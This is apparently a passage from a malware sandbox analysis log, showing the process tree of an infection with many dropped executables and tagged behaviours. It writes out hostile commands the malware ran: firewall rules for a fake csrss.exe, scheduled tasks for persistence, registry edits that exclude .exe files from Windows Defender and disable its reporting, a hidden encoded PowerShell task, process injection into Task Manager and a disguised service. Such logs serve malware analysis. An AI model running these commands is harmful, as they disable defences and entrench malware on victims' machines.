C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 820
4⤵
- Program crash
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 728
4⤵
- Program crash
PID:628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 832
4⤵
- Program crash
PID:3220

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:2192

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:3064

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 328
5⤵
- Program crash
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 336
5⤵
- Program crash
PID:3604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 336
5⤵
- Program crash
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 660
5⤵
- Program crash
PID:3440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 700
5⤵
- Program crash
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 700
5⤵
- Program crash
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 736
5⤵
- Program crash
PID:1528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 744
5⤵
- Program crash
PID:2548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 880
5⤵
- Program crash
PID:4804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 788
5⤵
- Program crash
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 936
5⤵
- Program crash
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 952
5⤵
- Program crash
PID:2400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 996
5⤵
- Program crash
PID:2240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 720
5⤵
- Program crash
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1008
5⤵
- Program crash
PID:2604

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 696
5⤵
- Program crash
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1032
5⤵
- Program crash
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1100
5⤵
- Program crash
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 604
5⤵
- Program crash
PID:3500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1068
5⤵
- Program crash
PID:2352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1072
5⤵
- Program crash
PID:2632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 924
5⤵
- Program crash
PID:3740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1032
5⤵
- Program crash
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1032
5⤵
- Program crash
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 604
5⤵
- Program crash
PID:4236

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:4160

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:4700

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 924
5⤵
PID:6936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1016
5⤵
PID:6472

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:1776

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4320

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4988

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3024

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4864

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4300

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3152

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3644

C:\Users\Admin\Pictures\Adobe Films\W1_pEOkwX0ho7sTdp8HsZAP2.exe
"C:\Users\Admin\Pictures\Adobe Films\W1_pEOkwX0ho7sTdp8HsZAP2.exe"
3⤵
- Executes dropped EXE
PID:908

C:\Users\Admin\Pictures\Adobe Films\rlX816mGw7kZIFzacSmBmJ7e.exe
"C:\Users\Admin\Pictures\Adobe Films\rlX816mGw7kZIFzacSmBmJ7e.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5100

C:\Users\Admin\Documents\_j715KV6HxAdfmV1xLwXzyuT.exe
"C:\Users\Admin\Documents\_j715KV6HxAdfmV1xLwXzyuT.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5636

C:\Users\Admin\Pictures\Adobe Films\bkhJWvOrXLmm7wAHwtOUjwLb.exe
"C:\Users\Admin\Pictures\Adobe Films\bkhJWvOrXLmm7wAHwtOUjwLb.exe"
5⤵
PID:260

C:\Users\Admin\Pictures\Adobe Films\4Iucy5dtQnOj4yB5CgumUHpn.exe
"C:\Users\Admin\Pictures\Adobe Films\4Iucy5dtQnOj4yB5CgumUHpn.exe"
5⤵
PID:6320

C:\Users\Admin\AppData\Local\Temp\is-15P91.tmp\4Iucy5dtQnOj4yB5CgumUHpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-15P91.tmp\4Iucy5dtQnOj4yB5CgumUHpn.tmp" /SL5="$C017E,140006,56320,C:\Users\Admin\Pictures\Adobe Films\4Iucy5dtQnOj4yB5CgumUHpn.exe"
6⤵
PID:6512

C:\Users\Admin\AppData\Local\Temp\is-3JSQC.tmp\5(6665____.exe
"C:\Users\Admin\AppData\Local\Temp\is-3JSQC.tmp\5(6665____.exe" /S /UID=91
7⤵
PID:7064

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
8⤵
PID:7088

C:\Users\Admin\Pictures\Adobe Films\IYTKDpd8tlGw_ZWdAhOwXpk_.exe
"C:\Users\Admin\Pictures\Adobe Films\IYTKDpd8tlGw_ZWdAhOwXpk_.exe"
5⤵
PID:6384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6384 -s 624
6⤵
PID:6988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6384 -s 632
6⤵
PID:5680

C:\Users\Admin\Pictures\Adobe Films\HHBlcZlzAAPULW_gKBNS5exV.exe
"C:\Users\Admin\Pictures\Adobe Films\HHBlcZlzAAPULW_gKBNS5exV.exe"
5⤵
PID:6488

C:\Users\Admin\Pictures\Adobe Films\kJeDxEM2WKTTNtv_sb8xo78N.exe
"C:\Users\Admin\Pictures\Adobe Films\kJeDxEM2WKTTNtv_sb8xo78N.exe"
5⤵
PID:6480

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
6⤵
PID:7136

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
7⤵
PID:6940

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
8⤵
PID:5260

C:\Users\Admin\Pictures\Adobe Films\cTTXtX8UUX4JGvQcfJEEFNzL.exe
"C:\Users\Admin\Pictures\Adobe Films\cTTXtX8UUX4JGvQcfJEEFNzL.exe"
5⤵
PID:5492

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5712

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5908

C:\Users\Admin\Pictures\Adobe Films\gzS6rbGPU1EZPQTUVLMrn7q5.exe
"C:\Users\Admin\Pictures\Adobe Films\gzS6rbGPU1EZPQTUVLMrn7q5.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5012

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
4⤵
PID:5008

C:\Users\Admin\Pictures\Adobe Films\rH8MYFkGOLLATkR32GhOKCql.exe
"C:\Users\Admin\Pictures\Adobe Films\rH8MYFkGOLLATkR32GhOKCql.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 624
4⤵
PID:5900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 764
4⤵
PID:6672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 1040
4⤵
PID:6200

C:\Users\Admin\Pictures\Adobe Films\KiKAQzH09soNbMxVpQFOq7RX.exe
"C:\Users\Admin\Pictures\Adobe Films\KiKAQzH09soNbMxVpQFOq7RX.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4176

C:\Users\Admin\Pictures\Adobe Films\GwO_2OM7gbGEaJk9mFQFWpc1.exe
"C:\Users\Admin\Pictures\Adobe Films\GwO_2OM7gbGEaJk9mFQFWpc1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2588

C:\Users\Admin\Pictures\Adobe Films\GwO_2OM7gbGEaJk9mFQFWpc1.exe
"C:\Users\Admin\Pictures\Adobe Films\GwO_2OM7gbGEaJk9mFQFWpc1.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:116

C:\Users\Admin\Pictures\Adobe Films\JaDEtlapSjxxI_ZqyH4MFcfS.exe
"C:\Users\Admin\Pictures\Adobe Films\JaDEtlapSjxxI_ZqyH4MFcfS.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4840

C:\Users\Admin\Pictures\Adobe Films\SFjFVmkKnSoShKKFwn566opt.exe
"C:\Users\Admin\Pictures\Adobe Films\SFjFVmkKnSoShKKFwn566opt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2244

C:\Users\Admin\AppData\Local\Temp\7zS8F58.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5892

C:\Users\Admin\AppData\Local\Temp\7zSD53A.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6572

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:6956

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:5936

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:5456

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:6068

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:5600

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gQcCcQkNH" /SC once /ST 00:44:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:5472

C:\Users\Admin\Pictures\Adobe Films\O2FQ_zwITlykcrCcg9eOnm_b.exe
"C:\Users\Admin\Pictures\Adobe Films\O2FQ_zwITlykcrCcg9eOnm_b.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1472

C:\Users\Admin\Pictures\Adobe Films\O2FQ_zwITlykcrCcg9eOnm_b.exe
"C:\Users\Admin\Pictures\Adobe Films\O2FQ_zwITlykcrCcg9eOnm_b.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 424
4⤵
PID:5412

C:\Users\Admin\Pictures\Adobe Films\UpIyVDbOzGsU86jzSDuT704v.exe
"C:\Users\Admin\Pictures\Adobe Films\UpIyVDbOzGsU86jzSDuT704v.exe"
3⤵
- Executes dropped EXE
PID:4812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:6596

C:\Users\Admin\Pictures\Adobe Films\ixZcamiQqZPrcGOTEY9nRZ0R.exe
"C:\Users\Admin\Pictures\Adobe Films\ixZcamiQqZPrcGOTEY9nRZ0R.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2804

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
4⤵
PID:5512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
4⤵
PID:5532

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:2500

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:6860

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:7020

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:4552

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:6512

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
6⤵
PID:2064

C:\Users\Admin\Pictures\Adobe Films\FCLlb7XZEV2HcE0uHejczRnm.exe
"C:\Users\Admin\Pictures\Adobe Films\FCLlb7XZEV2HcE0uHejczRnm.exe"
3⤵
- Executes dropped EXE
PID:3092

C:\Users\Admin\Pictures\Adobe Films\rKvFY6CnHWie444hMUObNLtV.exe
"C:\Users\Admin\Pictures\Adobe Films\rKvFY6CnHWie444hMUObNLtV.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4168

C:\Users\Admin\AppData\Local\Temp\is-5JD9N.tmp\rKvFY6CnHWie444hMUObNLtV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5JD9N.tmp\rKvFY6CnHWie444hMUObNLtV.tmp" /SL5="$A017E,140006,56320,C:\Users\Admin\Pictures\Adobe Films\rKvFY6CnHWie444hMUObNLtV.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1624

C:\Users\Admin\AppData\Local\Temp\is-RSLP5.tmp\5(6665____.exe
"C:\Users\Admin\AppData\Local\Temp\is-RSLP5.tmp\5(6665____.exe" /S /UID=91
5⤵
PID:6068

C:\Users\Admin\Pictures\Adobe Films\FUHfCYkZkHsvnaBOFezci_VP.exe
"C:\Users\Admin\Pictures\Adobe Films\FUHfCYkZkHsvnaBOFezci_VP.exe"
3⤵
- Executes dropped EXE
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 424
4⤵
- Program crash
PID:1388

C:\Users\Admin\Pictures\Adobe Films\_KEy8rORV47kA2jvlkhTj5sm.exe
"C:\Users\Admin\Pictures\Adobe Films\_KEy8rORV47kA2jvlkhTj5sm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\reccgubm\
4⤵
PID:5616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mdegizoh.exe" C:\Windows\SysWOW64\reccgubm\
4⤵
PID:6084

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create reccgubm binPath= "C:\Windows\SysWOW64\reccgubm\mdegizoh.exe /d\"C:\Users\Admin\Pictures\Adobe Films\_KEy8rORV47kA2jvlkhTj5sm.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5288

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description reccgubm "wifi internet conection"
4⤵
PID:3632

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start reccgubm
4⤵
PID:5236

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 644
4⤵
PID:6344

C:\Users\Admin\Pictures\Adobe Films\CUiVm5CZ74ksoLUi1daJiVmQ.exe
"C:\Users\Admin\Pictures\Adobe Films\CUiVm5CZ74ksoLUi1daJiVmQ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 464
4⤵
PID:5400

C:\Users\Admin\Pictures\Adobe Films\Vvt51hX9LGs41wRt6jjl79A9.exe
"C:\Users\Admin\Pictures\Adobe Films\Vvt51hX9LGs41wRt6jjl79A9.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2240

C:\Users\Admin\AppData\Local\Temp\0DI24.exe
"C:\Users\Admin\AppData\Local\Temp\0DI24.exe"
4⤵
PID:5344

C:\Users\Admin\AppData\Local\Temp\go-memexec-076778247.exe
C:\Users\Admin\AppData\Local\Temp\go-memexec-076778247.exe
5⤵
PID:3932

C:\Users\Admin\AppData\Local\Temp\031AF.exe
"C:\Users\Admin\AppData\Local\Temp\031AF.exe"
4⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\08824.exe
"C:\Users\Admin\AppData\Local\Temp\08824.exe"
4⤵
PID:5300

C:\Users\Admin\AppData\Local\Temp\08824.exe
"C:\Users\Admin\AppData\Local\Temp\08824.exe"
4⤵
PID:4000

C:\Users\Admin\AppData\Local\Temp\08824.exe
"C:\Users\Admin\AppData\Local\Temp\08824.exe"
4⤵
PID:5588

C:\Users\Admin\AppData\Local\Temp\08824HMJH8M7DKD.exe
https://iplogger.org/1OUvJ
4⤵
PID:5384

C:\Users\Admin\Pictures\Adobe Films\ngrb4QAhKGaZvpKVZrEs7TAt.exe
"C:\Users\Admin\Pictures\Adobe Films\ngrb4QAhKGaZvpKVZrEs7TAt.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2260

C:\Users\Admin\Pictures\Adobe Films\eXbyB37rZ0OaYLSf9eU33wGD.exe
"C:\Users\Admin\Pictures\Adobe Films\eXbyB37rZ0OaYLSf9eU33wGD.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2352

C:\Users\Admin\Pictures\Adobe Films\ccl7mJzQxh24f91pr8C8K0zf.exe
"C:\Users\Admin\Pictures\Adobe Films\ccl7mJzQxh24f91pr8C8K0zf.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1992

C:\Users\Admin\Pictures\Adobe Films\i80S_6Pl5Xx0wyEndZkCZyhk.exe
"C:\Users\Admin\Pictures\Adobe Films\i80S_6Pl5Xx0wyEndZkCZyhk.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2548

C:\Users\Admin\Pictures\Adobe Films\o3QZyGTuOh0dnMxFZ66zTodT.exe
"C:\Users\Admin\Pictures\Adobe Films\o3QZyGTuOh0dnMxFZ66zTodT.exe"
3⤵
- Executes dropped EXE
PID:2284

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping yahoo.com
4⤵
PID:2072

C:\Windows\SysWOW64\PING.EXE
ping yahoo.com
5⤵
- Runs ping.exe
PID:3644

C:\Users\Admin\Pictures\Adobe Films\Z4ZSlXNomGbScV2GJAGzQd_0.exe
"C:\Users\Admin\Pictures\Adobe Films\Z4ZSlXNomGbScV2GJAGzQd_0.exe"
3⤵
- Executes dropped EXE
PID:544

C:\Users\Admin\Pictures\Adobe Films\Z4ZSlXNomGbScV2GJAGzQd_0.exe
"C:\Users\Admin\Pictures\Adobe Films\Z4ZSlXNomGbScV2GJAGzQd_0.exe"
4⤵
PID:1404

C:\Users\Admin\Pictures\Adobe Films\pkw4sC1xj9comutOSMhYswPi.exe
"C:\Users\Admin\Pictures\Adobe Films\pkw4sC1xj9comutOSMhYswPi.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2400

C:\Users\Admin\Pictures\Adobe Films\n_fNQt5nNovTFAQa682C7pDy.exe
"C:\Users\Admin\Pictures\Adobe Films\n_fNQt5nNovTFAQa682C7pDy.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3492

C:\Users\Admin\Pictures\Adobe Films\d9H1uWQsKmp1oDDDLkKcqRF1.exe
"C:\Users\Admin\Pictures\Adobe Films\d9H1uWQsKmp1oDDDLkKcqRF1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4180

C:\Users\Admin\Pictures\Adobe Films\X6GTYiWjljlO4KO4OWfN7Ht5.exe
"C:\Users\Admin\Pictures\Adobe Films\X6GTYiWjljlO4KO4OWfN7Ht5.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5008

C:\Users\Admin\Pictures\Adobe Films\mFY23IUwQNj7co79jeBsFtUh.exe
"C:\Users\Admin\Pictures\Adobe Films\mFY23IUwQNj7co79jeBsFtUh.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5452

C:\Users\Admin\AppData\Local\Temp\is-5FIKC.tmp\mFY23IUwQNj7co79jeBsFtUh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5FIKC.tmp\mFY23IUwQNj7co79jeBsFtUh.tmp" /SL5="$10324,140518,56832,C:\Users\Admin\Pictures\Adobe Films\mFY23IUwQNj7co79jeBsFtUh.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5672

C:\Users\Admin\AppData\Local\Temp\is-QBNA4.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-QBNA4.tmp\RYUT55.exe" /S /UID=2710
5⤵
PID:6092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1536 -ip 1536
1⤵
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1536 -ip 1536
1⤵
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1536 -ip 1536
1⤵
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1536 -ip 1536
1⤵
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1536 -ip 1536
1⤵
PID:1760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1536 -ip 1536
1⤵
PID:840

C:\Windows\SysWOW64\WerFault.exe
